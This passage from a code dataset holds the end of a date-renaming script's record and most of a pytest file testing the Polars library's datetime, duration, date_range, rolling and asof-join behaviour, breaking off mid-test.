% (usFilename, euFilename))\n #shutil.move(amerFilename, euroFilename) # uncomment after testing\n","repo_name":"joaopmt/automation-scripts","sub_path":"MyPythonScripts/renameDates.py","file_name":"renameDates.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6403050234","text":"from __future__ import annotations\n\nimport io\nimport sys\nfrom datetime import date, datetime, time, timedelta\nfrom typing import TYPE_CHECKING, no_type_check\n\nimport numpy as np\nimport pandas as pd\nimport pyarrow as pa\nimport pytest\n\nif sys.version_info >= (3, 9):\n import zoneinfo\nelse:\n from backports import zoneinfo\n\nimport polars as pl\nfrom polars.datatypes import DTYPE_TEMPORAL_UNITS, TemporalDataType\nfrom polars.testing import assert_series_equal, verify_series_and_expr_api\n\nif TYPE_CHECKING:\n from polars.internals.type_aliases import TimeUnit\n\n\ndef test_fill_null() -> None:\n dt = datetime.strptime(\"2021-01-01\", \"%Y-%m-%d\")\n s = pl.Series(\"A\", [dt, None])\n\n for fill_val in (dt, pl.lit(dt)):\n out = s.fill_null(fill_val)\n\n assert out.null_count() == 0\n assert out.dt[0] == dt\n assert out.dt[1] == dt\n\n dt1 = date(2001, 1, 1)\n dt2 = date(2001, 1, 2)\n dt3 = date(2001, 1, 3)\n s = pl.Series(\"a\", [dt1, dt2, dt3, None])\n dt_2 = date(2001, 1, 4)\n for fill_val in (dt_2, pl.lit(dt_2)):\n out = s.fill_null(fill_val)\n\n assert out.null_count() == 0\n assert out.dt[0] == dt1\n assert out.dt[1] == dt2\n assert out.dt[-1] == dt_2\n\n\ndef test_filter_date() -> None:\n dataset = pl.DataFrame(\n {\"date\": [\"2020-01-02\", \"2020-01-03\", \"2020-01-04\"], \"index\": [1, 2, 3]}\n )\n df = dataset.with_column(pl.col(\"date\").str.strptime(pl.Date, \"%Y-%m-%d\"))\n assert df.filter(pl.col(\"date\") <= pl.lit(datetime(2019, 1, 3))).is_empty()\n assert df.filter(pl.col(\"date\") < pl.lit(datetime(2020, 1, 4))).shape[0] == 2\n assert df.filter(pl.col(\"date\") < pl.lit(datetime(2020, 1, 5))).shape[0] == 3\n assert df.filter(pl.col(\"date\") <= pl.lit(date(2019, 1, 3))).is_empty()\n assert df.filter(pl.col(\"date\") < pl.lit(date(2020, 1, 4))).shape[0] == 2\n assert df.filter(pl.col(\"date\") < pl.lit(date(2020, 1, 5))).shape[0] == 3\n\n\ndef test_filter_time() -> None:\n df = pl.DataFrame({\"t\": [time(8, 0), time(9, 0), time(10, 0)]})\n assert df.filter(pl.col(\"t\") <= pl.lit(time(7, 0))).is_empty()\n assert df.filter(pl.col(\"t\") < pl.lit(time(10, 0))).shape[0] == 2\n assert df.filter(pl.col(\"t\") < pl.lit(time(11, 0))).shape[0] == 3\n\n\ndef test_series_add_timedelta() -> None:\n dates = pl.Series(\n [datetime(2000, 1, 1), datetime(2027, 5, 19), datetime(2054, 10, 4)]\n )\n out = pl.Series(\n [datetime(2027, 5, 19), datetime(2054, 10, 4), datetime(2082, 2, 19)]\n )\n assert (dates + timedelta(days=10_000)).series_equal(out)\n\n\ndef test_series_add_datetime() -> None:\n deltas = pl.Series([timedelta(10_000), timedelta(20_000), timedelta(30_000)])\n out = pl.Series(\n [datetime(2027, 5, 19), datetime(2054, 10, 4), datetime(2082, 2, 19)]\n )\n assert_series_equal(deltas + pl.Series([datetime(2000, 1, 1)]), out)\n\n\ndef test_diff_datetime() -> None:\n df = pl.DataFrame(\n {\n \"timestamp\": [\"2021-02-01\", \"2021-03-1\", \"2850-04-1\"],\n \"guild\": [1, 2, 3],\n \"char\": [\"a\", \"a\", \"b\"],\n }\n )\n\n out = (\n df.with_columns(\n [\n pl.col(\"timestamp\").str.strptime(pl.Date, fmt=\"%Y-%m-%d\"),\n ]\n ).with_columns([pl.col(\"timestamp\").diff().list().over(\"char\")])\n 
)[\"timestamp\"]\n assert (out[0] == out[1]).all()\n\n\ndef test_from_pydatetime() -> None:\n datetimes = [\n datetime(2021, 1, 1),\n datetime(2021, 1, 2),\n datetime(2021, 1, 3),\n datetime(2021, 1, 4, 12, 12),\n None,\n ]\n s = pl.Series(\"name\", datetimes)\n assert s.dtype == pl.Datetime\n assert s.name == \"name\"\n assert s.null_count() == 1\n assert s.dt[0] == datetimes[0]\n\n dates = [date(2021, 1, 1), date(2021, 1, 2), date(2021, 1, 3), None]\n s = pl.Series(\"name\", dates)\n assert s.dtype == pl.Date\n assert s.name == \"name\"\n assert s.null_count() == 1\n assert s.dt[0] == dates[0]\n\n\ndef test_int_to_python_datetime() -> None:\n df = pl.DataFrame({\"a\": [100_000_000, 200_000_000]}).with_columns(\n [\n pl.col(\"a\").cast(pl.Datetime).alias(\"b\"),\n pl.col(\"a\").cast(pl.Datetime(\"ms\")).alias(\"c\"),\n pl.col(\"a\").cast(pl.Datetime(\"us\")).alias(\"d\"),\n pl.col(\"a\").cast(pl.Datetime(\"ns\")).alias(\"e\"),\n ]\n )\n assert df.rows() == [\n (\n 100000000,\n datetime(1970, 1, 1, 0, 1, 40),\n datetime(1970, 1, 2, 3, 46, 40),\n datetime(1970, 1, 1, 0, 1, 40),\n datetime(1970, 1, 1, 0, 0, 0, 100000),\n ),\n (\n 200000000,\n datetime(1970, 1, 1, 0, 3, 20),\n datetime(1970, 1, 3, 7, 33, 20),\n datetime(1970, 1, 1, 0, 3, 20),\n datetime(1970, 1, 1, 0, 0, 0, 200000),\n ),\n ]\n assert df.select(\n [pl.col(col).dt.timestamp() for col in (\"c\", \"d\", \"e\")]\n + [\n getattr(pl.col(\"b\").cast(pl.Duration).dt, unit)().alias(f\"u[{unit}]\")\n for unit in (\"milliseconds\", \"microseconds\", \"nanoseconds\")\n ]\n ).rows() == [\n (100000000000, 100000000, 100000, 100000, 100000000, 100000000000),\n (200000000000, 200000000, 200000, 200000, 200000000, 200000000000),\n ]\n\n\ndef test_int_to_python_timedelta() -> None:\n df = pl.DataFrame({\"a\": [100_001, 200_002]}).with_columns(\n [\n pl.col(\"a\").cast(pl.Duration).alias(\"b\"),\n pl.col(\"a\").cast(pl.Duration(\"ms\")).alias(\"c\"),\n pl.col(\"a\").cast(pl.Duration(\"us\")).alias(\"d\"),\n pl.col(\"a\").cast(pl.Duration(\"ns\")).alias(\"e\"),\n ]\n )\n assert df.rows() == [\n (\n 100001,\n timedelta(microseconds=100001),\n timedelta(seconds=100, microseconds=1000),\n timedelta(microseconds=100001),\n timedelta(microseconds=100),\n ),\n (\n 200002,\n timedelta(microseconds=200002),\n timedelta(seconds=200, microseconds=2000),\n timedelta(microseconds=200002),\n timedelta(microseconds=200),\n ),\n ]\n\n assert df.select(\n [pl.col(col).dt.timestamp() for col in (\"c\", \"d\", \"e\")]\n ).rows() == [(100001, 100001, 100001), (200002, 200002, 200002)]\n\n\ndef test_from_numpy() -> None:\n # note: numpy timeunit support is limited to those supported by polars.\n # as a result, datetime64[s] will be stored as object.\n x = np.asarray(range(100_000, 200_000, 10_000), dtype=\"datetime64[s]\")\n s = pl.Series(x)\n assert s[0] == x[0]\n assert len(s) == 10\n\n\ndef test_datetime_consistency() -> None:\n dt = datetime(2022, 7, 5, 10, 30, 45, 123455)\n df = pl.DataFrame({\"date\": [dt]})\n\n assert df[\"date\"].dt[0] == dt\n\n for date_literal in (\n dt,\n np.datetime64(dt, \"us\"),\n np.datetime64(dt, \"ns\"),\n ):\n assert df.select(pl.lit(date_literal))[\"literal\"].dt[0] == dt\n assert df.filter(pl.col(\"date\") == date_literal).rows() == [(dt,)]\n\n ddf = df.select(\n [\n pl.col(\"date\"),\n pl.lit(dt).alias(\"dt\"),\n pl.lit(dt).cast(pl.Datetime(\"ms\")).alias(\"dt_ms\"),\n pl.lit(dt).cast(pl.Datetime(\"us\")).alias(\"dt_us\"),\n pl.lit(dt).cast(pl.Datetime(\"ns\")).alias(\"dt_ns\"),\n ]\n )\n assert ddf.schema == {\n \"date\": 
pl.Datetime(\"us\"),\n \"dt\": pl.Datetime(\"us\"),\n \"dt_ms\": pl.Datetime(\"ms\"),\n \"dt_us\": pl.Datetime(\"us\"),\n \"dt_ns\": pl.Datetime(\"ns\"),\n }\n assert ddf.select([pl.col(c).cast(int) for c in ddf.schema]).rows() == [\n (\n 1657017045123455,\n 1657017045123455,\n 1657017045123,\n 1657017045123455,\n 1657017045123455000,\n )\n ]\n\n test_data = [\n datetime(2000, 1, 1, 1, 1, 1, 555555),\n datetime(2514, 5, 30, 1, 53, 4, 986754),\n datetime(3099, 12, 31, 23, 59, 59, 123456),\n datetime(9999, 12, 31, 23, 59, 59, 999999),\n ]\n ddf = pl.DataFrame({\"dtm\": test_data}).with_column(\n pl.col(\"dtm\").dt.nanosecond().alias(\"ns\")\n )\n assert ddf.rows() == [\n (test_data[0], 555555000),\n (test_data[1], 986754000),\n (test_data[2], 123456000),\n (test_data[3], 999999000),\n ]\n\n\ndef test_timezone() -> None:\n ts = pa.timestamp(\"s\")\n data = pa.array([1000, 2000], type=ts)\n s: pl.Series = pl.from_arrow(data) # type: ignore[assignment]\n\n # with timezone; we do expect a warning here\n tz_ts = pa.timestamp(\"s\", tz=\"America/New_York\")\n tz_data = pa.array([1000, 2000], type=tz_ts)\n # with pytest.warns(Warning):\n tz_s: pl.Series = pl.from_arrow(tz_data) # type: ignore[assignment]\n\n # different timezones are not considered equal\n # we check both `null_equal=True` and `null_equal=False`\n # https://github.com/pola-rs/polars/issues/5023\n assert not s.series_equal(tz_s, null_equal=False)\n assert not s.series_equal(tz_s, null_equal=True)\n assert s.cast(int).series_equal(tz_s.cast(int))\n\n\ndef test_to_list() -> None:\n s = pl.Series(\"date\", [123543, 283478, 1243]).cast(pl.Date)\n\n out = s.to_list()\n assert out[0] == date(2308, 4, 2)\n\n s = pl.Series(\"datetime\", [a * 1_000_000 for a in [123543, 283478, 1243]]).cast(\n pl.Datetime\n )\n out = s.to_list()\n assert out[0] == datetime(1970, 1, 2, 10, 19, 3)\n\n\ndef test_rows() -> None:\n s0 = pl.Series(\"date\", [123543, 283478, 1243]).cast(pl.Date)\n s1 = (\n pl.Series(\"datetime\", [a * 1_000_000 for a in [123543, 283478, 1243]])\n .cast(pl.Datetime)\n .dt.with_time_unit(\"ns\")\n )\n df = pl.DataFrame([s0, s1])\n\n rows = df.rows()\n assert rows[0][0] == date(2308, 4, 2)\n assert rows[0][1] == datetime(1970, 1, 1, 0, 2, 3, 543000)\n\n\ndef test_to_numpy() -> None:\n s0 = pl.Series(\"date\", [123543, 283478, 1243]).cast(pl.Date)\n s1 = pl.Series(\n \"datetime\", [datetime(2021, 1, 2, 3, 4, 5), datetime(2021, 2, 3, 4, 5, 6)]\n )\n s2 = pl.date_range(\n datetime(2021, 1, 1, 0), datetime(2021, 1, 1, 1), interval=\"1h\", time_unit=\"ms\"\n )\n assert str(s0.to_numpy()) == \"['2308-04-02' '2746-02-20' '1973-05-28']\"\n assert (\n str(s1.to_numpy()[:2])\n == \"['2021-01-02T03:04:05.000000' '2021-02-03T04:05:06.000000']\"\n )\n assert (\n str(s2.to_numpy()[:2])\n == \"['2021-01-01T00:00:00.000' '2021-01-01T01:00:00.000']\"\n )\n s3 = pl.Series([timedelta(hours=1), timedelta(hours=-2)])\n out = np.array([3_600_000_000_000, -7_200_000_000_000], dtype=\"timedelta64[ns]\")\n assert (s3.to_numpy() == out).all()\n\n\ndef test_truncate() -> None:\n start = datetime(2001, 1, 1)\n stop = datetime(2001, 1, 2)\n\n s1 = pl.date_range(\n start, stop, timedelta(minutes=30), name=\"dates[ms]\", time_unit=\"ms\"\n )\n s2 = pl.date_range(\n start, stop, timedelta(minutes=30), name=\"dates[us]\", time_unit=\"us\"\n )\n s3 = pl.date_range(\n start, stop, timedelta(minutes=30), name=\"dates[ns]\", time_unit=\"ns\"\n )\n\n # can pass strings and timedeltas\n for out in [\n s1.dt.truncate(\"1h\"),\n s2.dt.truncate(\"1h0m0s\"),\n 
s3.dt.truncate(timedelta(hours=1)),\n ]:\n assert out.dt[0] == start\n assert out.dt[1] == start\n assert out.dt[2] == start + timedelta(hours=1)\n assert out.dt[3] == start + timedelta(hours=1)\n # ...\n assert out.dt[-3] == stop - timedelta(hours=1)\n assert out.dt[-2] == stop - timedelta(hours=1)\n assert out.dt[-1] == stop\n\n\ndef test_date_range() -> None:\n result = pl.date_range(\n date(1985, 1, 1), date(2015, 7, 1), timedelta(days=1, hours=12)\n )\n assert len(result) == 7426\n assert result.dt[0] == datetime(1985, 1, 1)\n assert result.dt[1] == datetime(1985, 1, 2, 12, 0)\n assert result.dt[2] == datetime(1985, 1, 4, 0, 0)\n assert result.dt[-1] == datetime(2015, 6, 30, 12, 0)\n\n for tu in DTYPE_TEMPORAL_UNITS:\n rng = pl.date_range(datetime(2020, 1, 1), date(2020, 1, 2), \"2h\", time_unit=tu)\n assert rng.time_unit == tu\n assert rng.shape == (13,)\n assert rng.dt[0] == datetime(2020, 1, 1)\n assert rng.dt[-1] == datetime(2020, 1, 2)\n\n # if low/high are both date, range is also be date _iif_ the granularity is >= 1d\n result = pl.date_range(date(2022, 1, 1), date(2022, 3, 1), \"1mo\", name=\"drange\")\n assert result.to_list() == [date(2022, 1, 1), date(2022, 2, 1), date(2022, 3, 1)]\n assert result.name == \"drange\"\n\n result = pl.date_range(date(2022, 1, 1), date(2022, 1, 2), \"1h30m\")\n assert list(result) == [\n datetime(2022, 1, 1, 0, 0),\n datetime(2022, 1, 1, 1, 30),\n datetime(2022, 1, 1, 3, 0),\n datetime(2022, 1, 1, 4, 30),\n datetime(2022, 1, 1, 6, 0),\n datetime(2022, 1, 1, 7, 30),\n datetime(2022, 1, 1, 9, 0),\n datetime(2022, 1, 1, 10, 30),\n datetime(2022, 1, 1, 12, 0),\n datetime(2022, 1, 1, 13, 30),\n datetime(2022, 1, 1, 15, 0),\n datetime(2022, 1, 1, 16, 30),\n datetime(2022, 1, 1, 18, 0),\n datetime(2022, 1, 1, 19, 30),\n datetime(2022, 1, 1, 21, 0),\n datetime(2022, 1, 1, 22, 30),\n datetime(2022, 1, 2, 0, 0),\n ]\n\n result = pl.date_range(\n datetime(2022, 1, 1), datetime(2022, 1, 1, 0, 1), \"987456321ns\"\n )\n assert len(result) == 61\n assert result.dtype.tu == \"ns\" # type: ignore[attr-defined]\n assert result.dt.second()[-1] == 59\n assert result.cast(pl.Utf8)[-1] == \"2022-01-01 00:00:59.247379260\"\n\n\n@pytest.mark.parametrize(\n \"one,two\",\n [\n (date(2001, 1, 1), date(2001, 1, 2)),\n (datetime(2001, 1, 1), datetime(2001, 1, 2)),\n (time(20, 10, 0), time(20, 10, 1)),\n # also test if the conversion stays correct with wide date ranges\n (date(201, 1, 1), date(201, 1, 2)),\n (date(5001, 1, 1), date(5001, 1, 2)),\n ],\n)\ndef test_date_comp(one: TemporalDataType, two: TemporalDataType) -> None:\n a = pl.Series(\"a\", [one, two])\n assert (a == one).to_list() == [True, False]\n assert (a == two).to_list() == [False, True]\n assert (a != one).to_list() == [False, True]\n assert (a > one).to_list() == [False, True]\n assert (a >= one).to_list() == [True, True]\n assert (a < one).to_list() == [False, False]\n assert (a <= one).to_list() == [True, False]\n\n\ndef test_truncate_negative_offset() -> None:\n df = pl.DataFrame(\n {\n \"event_date\": [\n datetime(2021, 4, 11),\n datetime(2021, 4, 29),\n datetime(2021, 5, 29),\n ],\n \"adm1_code\": [1, 2, 1],\n }\n )\n out = df.groupby_dynamic(\n index_column=\"event_date\",\n every=\"1mo\",\n period=\"2mo\",\n offset=\"-1mo\",\n include_boundaries=True,\n ).agg(\n [\n pl.col(\"adm1_code\"),\n ]\n )\n\n assert out[\"event_date\"].to_list() == [\n datetime(2021, 4, 1),\n datetime(2021, 4, 1),\n datetime(2021, 5, 1),\n ]\n df = pl.DataFrame(\n {\n \"event_date\": [\n datetime(2021, 4, 11),\n 
datetime(2021, 4, 29),\n datetime(2021, 5, 29),\n ],\n \"adm1_code\": [1, 2, 1],\n \"five_type\": [\"a\", \"b\", \"a\"],\n \"actor\": [\"a\", \"a\", \"a\"],\n \"admin\": [\"a\", \"a\", \"a\"],\n \"fatalities\": [10, 20, 30],\n }\n )\n\n out = df.groupby_dynamic(\n index_column=\"event_date\",\n every=\"1mo\",\n by=[\"admin\", \"five_type\", \"actor\"],\n ).agg([pl.col(\"adm1_code\").unique(), (pl.col(\"fatalities\") > 0).sum()])\n assert out[\"event_date\"].to_list() == [\n datetime(2021, 4, 1),\n datetime(2021, 5, 1),\n datetime(2021, 4, 1),\n ]\n\n for dt in [pl.Int32, pl.Int64]:\n df = pl.DataFrame(\n {\n \"idx\": np.arange(6),\n \"A\": [\"A\", \"A\", \"B\", \"B\", \"B\", \"C\"],\n }\n ).with_columns(pl.col(\"idx\").cast(dt))\n\n out = df.groupby_dynamic(\n \"idx\", every=\"2i\", period=\"3i\", include_boundaries=True\n ).agg(pl.col(\"A\").list())\n assert out.shape == (3, 4)\n\n\ndef test_to_arrow() -> None:\n date_series = pl.Series(\"dates\", [\"2022-01-16\", \"2022-01-17\"]).str.strptime(\n pl.Date, \"%Y-%m-%d\"\n )\n arr = date_series.to_arrow()\n assert arr.type == pa.date32()\n\n\ndef test_non_exact_strptime() -> None:\n a = pl.Series(\"a\", [\"2022-01-16\", \"2022-01-17\", \"foo2022-01-18\", \"b2022-01-19ar\"])\n fmt = \"%Y-%m-%d\"\n\n expected = pl.Series(\"a\", [date(2022, 1, 16), date(2022, 1, 17), None, None])\n verify_series_and_expr_api(\n a, expected, \"str.strptime\", pl.Date, fmt, strict=False, exact=True\n )\n\n expected = pl.Series(\n \"a\",\n [date(2022, 1, 16), date(2022, 1, 17), date(2022, 1, 18), date(2022, 1, 19)],\n )\n verify_series_and_expr_api(\n a, expected, \"str.strptime\", pl.Date, fmt, strict=False, exact=False\n )\n\n with pytest.raises(Exception):\n a.str.strptime(pl.Date, fmt, strict=True, exact=True)\n\n\ndef test_explode_date() -> None:\n datetimes = [\n datetime(2021, 12, 1, 0, 0),\n datetime(2021, 12, 1, 0, 0),\n datetime(2021, 12, 1, 0, 0),\n datetime(2021, 12, 1, 0, 0),\n ]\n dates = [\n date(2021, 12, 1),\n date(2021, 12, 1),\n date(2021, 12, 1),\n date(2021, 12, 1),\n ]\n for d in [dates, datetimes]:\n df = pl.DataFrame(\n {\n \"a\": d,\n \"b\": [\"a\", \"b\", \"a\", \"b\"],\n \"c\": [1.0, 2.0, 1.1, 2.2],\n }\n )\n out = (\n df.groupby(\"b\")\n .agg([pl.col(\"a\"), pl.col(\"c\").pct_change()])\n .explode([\"a\", \"c\"])\n )\n assert out.shape == (4, 3)\n\n\ndef test_rolling() -> None:\n dates = [\n \"2020-01-01 13:45:48\",\n \"2020-01-01 16:42:13\",\n \"2020-01-01 16:45:09\",\n \"2020-01-02 18:12:48\",\n \"2020-01-03 19:45:32\",\n \"2020-01-08 23:16:43\",\n ]\n\n df = pl.DataFrame({\"dt\": dates, \"a\": [3, 7, 5, 9, 2, 1]}).with_column(\n pl.col(\"dt\").str.strptime(pl.Datetime)\n )\n\n out = df.groupby_rolling(index_column=\"dt\", period=\"2d\").agg(\n [\n pl.sum(\"a\").alias(\"sum_a\"),\n pl.min(\"a\").alias(\"min_a\"),\n pl.max(\"a\").alias(\"max_a\"),\n ]\n )\n\n assert out[\"sum_a\"].to_list() == [3, 10, 15, 24, 11, 1]\n assert out[\"max_a\"].to_list() == [3, 7, 7, 9, 9, 1]\n assert out[\"min_a\"].to_list() == [3, 3, 3, 3, 2, 1]\n\n\ndef test_upsample() -> None:\n df = pl.DataFrame(\n {\n \"time\": [\n datetime(2021, 2, 1),\n datetime(2021, 4, 1),\n datetime(2021, 5, 1),\n datetime(2021, 6, 1),\n ],\n \"admin\": [\"Åland\", \"Netherlands\", \"Åland\", \"Netherlands\"],\n \"test2\": [0, 1, 2, 3],\n }\n ).with_column(pl.col(\"time\").dt.with_time_zone(\"UTC\"))\n\n up = df.upsample(\n time_column=\"time\", every=\"1mo\", by=\"admin\", maintain_order=True\n ).select(pl.all().forward_fill())\n # this print will panic if timezones feature is 
not activated\n # don't remove\n print(up)\n\n expected = pl.DataFrame(\n {\n \"time\": [\n datetime(2021, 2, 1, 0, 0),\n datetime(2021, 3, 1, 0, 0),\n datetime(2021, 4, 1, 0, 0),\n datetime(2021, 5, 1, 0, 0),\n datetime(2021, 4, 1, 0, 0),\n datetime(2021, 5, 1, 0, 0),\n datetime(2021, 6, 1, 0, 0),\n ],\n \"admin\": [\n \"Åland\",\n \"Åland\",\n \"Åland\",\n \"Åland\",\n \"Netherlands\",\n \"Netherlands\",\n \"Netherlands\",\n ],\n \"test2\": [0, 0, 0, 2, 1, 1, 3],\n }\n ).with_column(pl.col(\"time\").dt.with_time_zone(\"UTC\"))\n\n assert up.frame_equal(expected)\n\n\ndef test_microseconds_accuracy() -> None:\n timestamps = [\n datetime(2600, 1, 1, 0, 0, 0, 123456),\n datetime(2800, 1, 1, 0, 0, 0, 456789),\n ]\n a = pa.Table.from_arrays(\n arrays=[timestamps, [128, 256]],\n schema=pa.schema(\n [\n (\"timestamp\", pa.timestamp(\"us\")),\n (\"value\", pa.int16()),\n ]\n ),\n )\n\n assert pl.from_arrow(a)[\"timestamp\"].to_list() == timestamps\n\n\ndef test_cast_time_units() -> None:\n dates = pl.Series(\"dates\", [datetime(2001, 1, 1), datetime(2001, 2, 1, 10, 8, 9)])\n dates_in_ns = np.array([978307200000000000, 981022089000000000])\n\n assert dates.dt.cast_time_unit(\"ns\").cast(int).to_list() == list(dates_in_ns)\n assert dates.dt.cast_time_unit(\"us\").cast(int).to_list() == list(\n dates_in_ns // 1_000\n )\n assert dates.dt.cast_time_unit(\"ms\").cast(int).to_list() == list(\n dates_in_ns // 1_000_000\n )\n\n\ndef test_read_utc_times_parquet() -> None:\n df = pd.DataFrame(\n data={\n \"Timestamp\": pd.date_range(\n \"2022-01-01T00:00+00:00\", \"2022-01-01T10:00+00:00\", freq=\"H\"\n )\n }\n )\n f = io.BytesIO()\n df.to_parquet(f)\n f.seek(0)\n df_in = pl.read_parquet(f)\n tz = zoneinfo.ZoneInfo(\"UTC\")\n assert df_in[\"Timestamp\"][0] == datetime(2022, 1, 1, 0, 0).astimezone(tz)\n\n\ndef test_epoch() -> None:\n dates = pl.Series(\"dates\", [datetime(2001, 1, 1), datetime(2001, 2, 1, 10, 8, 9)])\n\n for unit in DTYPE_TEMPORAL_UNITS:\n assert dates.dt.epoch(unit).series_equal(dates.dt.timestamp(unit))\n\n assert dates.dt.epoch(\"s\").series_equal(dates.dt.timestamp(\"ms\") // 1000)\n assert dates.dt.epoch(\"d\").series_equal(\n (dates.dt.timestamp(\"ms\") // (1000 * 3600 * 24)).cast(pl.Int32)\n )\n\n\ndef test_default_negative_every_offset_dynamic_groupby() -> None:\n # 2791\n dts = [\n datetime(2020, 1, 1),\n datetime(2020, 1, 2),\n datetime(2020, 2, 1),\n datetime(2020, 3, 1),\n ]\n df = pl.DataFrame({\"dt\": dts, \"idx\": range(len(dts))})\n out = df.groupby_dynamic(index_column=\"dt\", every=\"1mo\", closed=\"right\").agg(\n pl.col(\"idx\")\n )\n\n expected = pl.DataFrame(\n {\n \"dt\": [\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 3, 1, 0, 0),\n ],\n \"idx\": [[0], [1, 2], [3]],\n }\n )\n assert out.frame_equal(expected)\n\n\ndef test_strptime_dates_datetimes() -> None:\n s = pl.Series(\"date\", [\"2021-04-22\", \"2022-01-04 00:00:00\"])\n assert s.str.strptime(pl.Datetime).to_list() == [\n datetime(2021, 4, 22, 0, 0),\n datetime(2022, 1, 4, 0, 0),\n ]\n\n\ndef test_strptime_precision() -> None:\n s = pl.Series(\n \"date\", [\"2022-09-12 21:54:36.789321456\", \"2022-09-13 12:34:56.987456321\"]\n )\n ds = s.str.strptime(pl.Datetime)\n assert ds.cast(pl.Date) != None # noqa: E711 (note: *deliberately* testing \"!=\")\n assert getattr(ds.dtype, \"tu\", None) == \"us\"\n\n time_units: list[TimeUnit] = [\"ms\", \"us\", \"ns\"]\n suffixes = [\"%.3f\", \"%.6f\", \"%.9f\"]\n test_data = zip(\n time_units,\n suffixes,\n (\n [789000000, 987000000],\n 
[789321000, 987456000],\n [789321456, 987456321],\n ),\n )\n for precision, suffix, expected_values in test_data:\n ds = s.str.strptime(pl.Datetime(precision), f\"%Y-%m-%d %H:%M:%S{suffix}\")\n assert getattr(ds.dtype, \"tu\", None) == precision\n assert ds.dt.nanosecond().to_list() == expected_values\n\n\ndef test_asof_join_tolerance_grouper() -> None:\n from datetime import date\n\n df1 = pl.DataFrame({\"date\": [date(2020, 1, 5), date(2020, 1, 10)], \"by\": [1, 1]})\n df2 = pl.DataFrame(\n {\n \"date\": [date(2020, 1, 5), date(2020, 1, 6)],\n \"by\": [1, 1],\n \"values\": [100, 200],\n }\n )\n\n out = df1.join_asof(df2, by=\"by\", on=\"date\", tolerance=\"3d\")\n\n expected = pl.DataFrame(\n {\n \"date\": [date(2020, 1, 5), date(2020, 1, 10)],\n \"by\": [1, 1],\n \"values\": [100, None],\n }\n )\n\n assert out.frame_equal(expected)\n\n\ndef test_duration_function() -> None:\n df = pl.DataFrame(\n {\n \"datetime\": [datetime(2022, 1, 1), datetime(2022, 1, 2)],\n \"add\": [1, 2],\n }\n )\n\n out = df.select(\n [\n (pl.col(\"datetime\") + pl.duration(weeks=\"add\")).alias(\"add_weeks\"),\n (pl.col(\"datetime\") + pl.duration(days=\"add\")).alias(\"add_days\"),\n (pl.col(\"datetime\") + pl.duration(seconds=\"add\")).alias(\"add_seconds\"),\n (pl.col(\"datetime\") + pl.duration(milliseconds=\"add\")).alias(\n \"add_milliseconds\"\n ),\n (pl.col(\"datetime\") + pl.duration(hours=\"add\")).alias(\"add_hours\"),\n ]\n )\n\n expected = pl.DataFrame(\n {\n \"add_weeks\": [datetime(2022, 1, 8), datetime(2022, 1, 16)],\n \"add_days\": [datetime(2022, 1, 2), datetime(2022, 1, 4)],\n \"add_seconds\": [\n datetime(2022, 1, 1, second=1),\n datetime(2022, 1, 2, second=2),\n ],\n \"add_milliseconds\": [\n datetime(2022, 1, 1, microsecond=1000),\n datetime(2022, 1, 2, microsecond=2000),\n ],\n \"add_hours\": [datetime(2022, 1, 1, hour=1), datetime(2022, 1, 2, hour=2)],\n }\n )\n\n assert out.frame_equal(expected)\n\n\ndef test_rolling_groupby_by_argument() -> None:\n df = pl.DataFrame({\"times\": range(10), \"groups\": [1] * 4 + [2] * 6})\n\n out = df.groupby_rolling(\"times\", \"5i\", by=[\"groups\"]).agg(\n pl.col(\"times\").list().alias(\"agg_list\")\n )\n\n expected = pl.DataFrame(\n {\n \"groups\": [1, 1, 1, 1, 2, 2, 2, 2, 2, 2],\n \"times\": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],\n \"agg_list\": [\n [0],\n [0, 1],\n [0, 1, 2],\n [0, 1, 2, 3],\n [4],\n [4, 5],\n [4, 5, 6],\n [4, 5, 6, 7],\n [4, 5, 6, 7, 8],\n [5, 6, 7, 8, 9],\n ],\n }\n )\n\n assert out.frame_equal(expected)\n\n\ndef test_groupby_rolling_mean_3020() -> None:\n df = pl.DataFrame(\n {\n \"Date\": [\n \"1998-04-12\",\n \"1998-04-19\",\n \"1998-04-26\",\n \"1998-05-03\",\n \"1998-05-10\",\n \"1998-05-17\",\n \"1998-05-24\",\n ],\n \"val\": range(7),\n }\n ).with_column(pl.col(\"Date\").str.strptime(pl.Date))\n assert (\n df.groupby_rolling(index_column=\"Date\", period=\"1w\")\n .agg(pl.col(\"val\").mean().alias(\"val_mean\"))\n .frame_equal(\n pl.DataFrame(\n {\n \"Date\": [\n date(1998, 4, 12),\n date(1998, 4, 19),\n date(1998, 4, 26),\n date(1998, 5, 3),\n date(1998, 5, 10),\n date(1998, 5, 17),\n date(1998, 5, 24),\n ],\n \"val_mean\": [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0],\n }\n )\n )\n )\n\n\ndef test_asof_join() -> None:\n fmt = \"%F %T%.3f\"\n dates = [\n \"2016-05-25 13:30:00.023\",\n \"2016-05-25 13:30:00.023\",\n \"2016-05-25 13:30:00.030\",\n \"2016-05-25 13:30:00.041\",\n \"2016-05-25 13:30:00.048\",\n \"2016-05-25 13:30:00.049\",\n \"2016-05-25 13:30:00.072\",\n \"2016-05-25 13:30:00.075\",\n ]\n ticker = [\n \"GOOG\",\n \"MSFT\",\n 
\"MSFT\",\n \"MSFT\",\n \"GOOG\",\n \"AAPL\",\n \"GOOG\",\n \"MSFT\",\n ]\n quotes = pl.DataFrame(\n {\n \"dates\": pl.Series(dates).str.strptime(pl.Datetime, fmt=fmt),\n \"ticker\": ticker,\n \"bid\": [720.5, 51.95, 51.97, 51.99, 720.50, 97.99, 720.50, 52.01],\n }\n )\n dates = [\n \"2016-05-25 13:30:00.023\",\n \"2016-05-25 13:30:00.038\",\n \"2016-05-25 13:30:00.048\",\n \"2016-05-25 13:30:00.048\",\n \"2016-05-25 13:30:00.048\",\n ]\n ticker = [\n \"MSFT\",\n \"MSFT\",\n \"GOOG\",\n \"GOOG\",\n \"AAPL\",\n ]\n trades = pl.DataFrame(\n {\n \"dates\": pl.Series(dates).str.strptime(pl.Datetime, fmt=fmt),\n \"ticker\": ticker,\n \"bid\": [51.95, 51.95, 720.77, 720.92, 98.0],\n }\n )\n assert trades.schema == {\n \"dates\": pl.Datetime(\"ms\"),\n \"ticker\": pl.Utf8,\n \"bid\": pl.Float64,\n }\n out = trades.join_asof(quotes, on=\"dates\", strategy=\"backward\")\n\n assert out.schema == {\n \"bid\": pl.Float64,\n 